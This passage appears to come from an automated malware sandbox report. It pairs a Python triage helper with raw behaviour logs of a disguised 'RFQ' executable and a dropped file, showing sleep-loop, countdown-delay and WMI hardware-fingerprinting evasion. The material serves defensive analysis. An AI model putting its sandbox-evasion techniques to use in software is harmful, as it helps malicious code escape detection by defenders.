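victim's IP and MAC, so that query is a VM-fingerprinting hint rather than proof. The Python helper encodes these checks over constructed sample lines modelled on this section; the process names are hypothetical and the "Source: <process> | <detail>" separator is an assumption about how the report text is exported.

```python
"""Triage helper for the sandbox-evasion entries above (added example, not Joe Sandbox code):
parses ``Source: <process> [TID: <n>] | <detail>`` lines and summarises them per process."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

# TimeSpan.MaxValue (9223372036854775807 ticks of 100 ns) is 922337203685477 ms: the value the report
# shows for a thread parked "forever", and proof that the delay figures are milliseconds.
TIMESPAN_MAX_MS = 9223372036854775807 // 10_000
SANDBOX_TIMEOUT_MS = 30_000  # the "-30000s" each sleep is compared against in the report

ENTRY_RE = re.compile(r"^Source:\s*(?P<proc>.+?\.exe)(?:\s+TID:\s*\d+)?\s*\|\s*(?P<detail>.*)$")
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(\d+)")
SLEEP_COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)")
WRITE_WATCH_RE = re.compile(r"Memory allocated:.*memory write watch")
WMI_ADAPTER_RE = re.compile(r"WMI Queries:.*Win32_NetworkAdapter")

# Constructed sample lines modelled on this section's entries; the process names are hypothetical.
SAMPLE = r"""
Source: C:\Users\user\Desktop\sample.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\sample.exe | Memory allocated: E90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\sample.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\sample.exe | Thread delayed: delay time: 1200000
Source: C:\Users\user\Desktop\sample.exe | Thread delayed: delay time: 1199891
Source: C:\Users\user\Desktop\sample.exe | Thread delayed: delay time: 1199766
Source: C:\Users\user\Desktop\sample.exe | Thread delayed: delay time: 1199656
Source: C:\Users\user\Desktop\sample.exe TID: 7436 | Thread sleep count: 32 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6516 | Thread sleep count: 8249 > 30
Source: C:\Users\user\AppData\Roaming\dropped.exe | Thread delayed: delay time: 5000
"""


@dataclass
class ProcessSummary:
    delays_ms: list[int] = field(default_factory=list)     # "Thread delayed" values
    sleep_counts: list[int] = field(default_factory=list)  # "Thread sleep count" per thread
    write_watch_allocs: int = 0
    adapter_wmi_queries: int = 0

    @property
    def finite_delays(self) -> list[int]:
        return [d for d in self.delays_ms if d < TIMESPAN_MAX_MS]


def timespan_max_multiple(total_ms: int) -> int | None:
    """Number of TimeSpan.MaxValue waits behind a per-thread 'Thread sleep time' total, if exact."""
    return total_ms // TIMESPAN_MAX_MS if total_ms % TIMESPAN_MAX_MS == 0 else None


def is_countdown(delays: list[int], min_step: int = 50, max_step: int = 300) -> bool:
    """True when successive delays shrink by a small, roughly constant step: the code sleeps in short
    slices and re-computes 'time left until the deadline' instead of issuing one long Sleep(), so a
    sandbox that only skips or shortens single long sleeps still has to wait out the whole period."""
    if len(delays) < 3:
        return False
    return all(min_step <= a - b <= max_step for a, b in zip(delays, delays[1:]))


def summarize(report_text: str) -> dict[str, ProcessSummary]:
    """Aggregate the evasion-related entries per process path."""
    out: dict[str, ProcessSummary] = defaultdict(ProcessSummary)
    for raw in report_text.splitlines():
        entry = ENTRY_RE.match(raw.strip())
        if not entry:
            continue
        s, detail = out[entry.group("proc")], entry.group("detail")
        if m := DELAY_RE.search(detail):
            s.delays_ms.append(int(m.group(1)))
        elif m := SLEEP_COUNT_RE.search(detail):
            s.sleep_counts.append(int(m.group(1)))
        elif WRITE_WATCH_RE.search(detail):
            s.write_watch_allocs += 1
        elif WMI_ADAPTER_RE.search(detail):
            s.adapter_wmi_queries += 1
        # "Thread sleep time" / "threadDelayed" lines restate the same calls per thread: not recounted
    return dict(out)


def findings(summary: dict[str, ProcessSummary]) -> dict[str, list[str]]:
    """Triage notes per process; processes with nothing to report are dropped."""
    result: dict[str, list[str]] = {}
    for proc, s in summary.items():
        notes, finite = [], s.finite_delays
        if len(s.delays_ms) > len(finite):
            notes.append(f"{len(s.delays_ms) - len(finite)} TimeSpan.MaxValue wait(s): thread parked indefinitely")
        if finite and max(finite) >= SANDBOX_TIMEOUT_MS:
            notes.append(f"longest finite delay {max(finite) / 60000:.1f} min, over the 30 s sandbox threshold")
        if is_countdown(finite):
            notes.append(f"countdown loop: {len(finite)} sleeps stepping down from {finite[0]} ms")
        if s.sleep_counts and max(s.sleep_counts) > 30:
            notes.append(f"sleep loop: up to {max(s.sleep_counts)} Sleep() calls on one thread")
        if s.write_watch_allocs:
            notes.append(f"{s.write_watch_allocs} MEM_WRITE_WATCH reservation(s); weak alone on a .NET sample (GC heap)")
        if s.adapter_wmi_queries:
            notes.append("Win32_NetworkAdapterConfiguration via WMI: VM fingerprint or victim IP/MAC lookup")
        if notes:
            result[proc] = notes
    return result
```

Run it as `findings(summarize(SAMPLE))`: the main sample process gets six notes, the PowerShell host gets only the sleep-loop note, and the dropped executable with a single 5-second delay produces nothing. The step bounds in is_countdown are tuned to the roughly 110 ms cadence seen in this report; a sample that slices its wait differently would need them adjusted.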
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 5820 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6516 | Thread sleep count: 8249 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656 | Thread sleep count: 1391 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732 | Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep count: 32 > 30
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7460 | Thread sleep count: 3254 > 30
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1199891s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7460 | Thread sleep count: 6595 > 30
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1199766s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1199656s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1199547s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1199435s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1199328s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1199219s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1199109s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1199000s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1198889s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1198781s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1198672s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1198563s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1198453s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1198344s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1198234s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1198125s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1198016s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1197906s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1197797s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1197688s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1197563s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1197438s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1197313s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1197203s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1197094s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1196969s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1196859s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1196681s >= -30000s
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436 | Thread sleep time: -1196531s >= -30000s
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196094s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194391s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 1848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep count: 34 > 30
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -31359464925306218s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1200000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7576Thread sleep count: 7343 > 30
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199874s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7576Thread sleep count: 2516 > 30
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199764s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199546s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199125s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198906s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198796s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198687s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198468s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198140s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198031s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197921s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197593s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197484s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197373s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197265s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197046s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196718s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196281s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196171s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196060s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195951s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195843s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195624s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195515s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195296s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195187s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195078s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194730s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194598s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194308s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194202s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194093s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1193982s >= -30000s
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1200000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199891Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199766Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199656Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199547Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199435Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199328Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199219Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199109Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198889Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198781Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198672Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198563Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198453Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198344Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198234Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198125Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198016Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197906Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197797Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197688Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197563Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197438Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197313Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197203Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197094Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196969Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196859Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196681Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196531Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196422Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196312Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196203Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196094Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195984Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195875Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195766Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195656Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195547Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195438Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195313Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195188Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195063Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194953Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194844Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194719Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194609Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194500Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194391Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194281Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199874
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199764
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199656
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199546
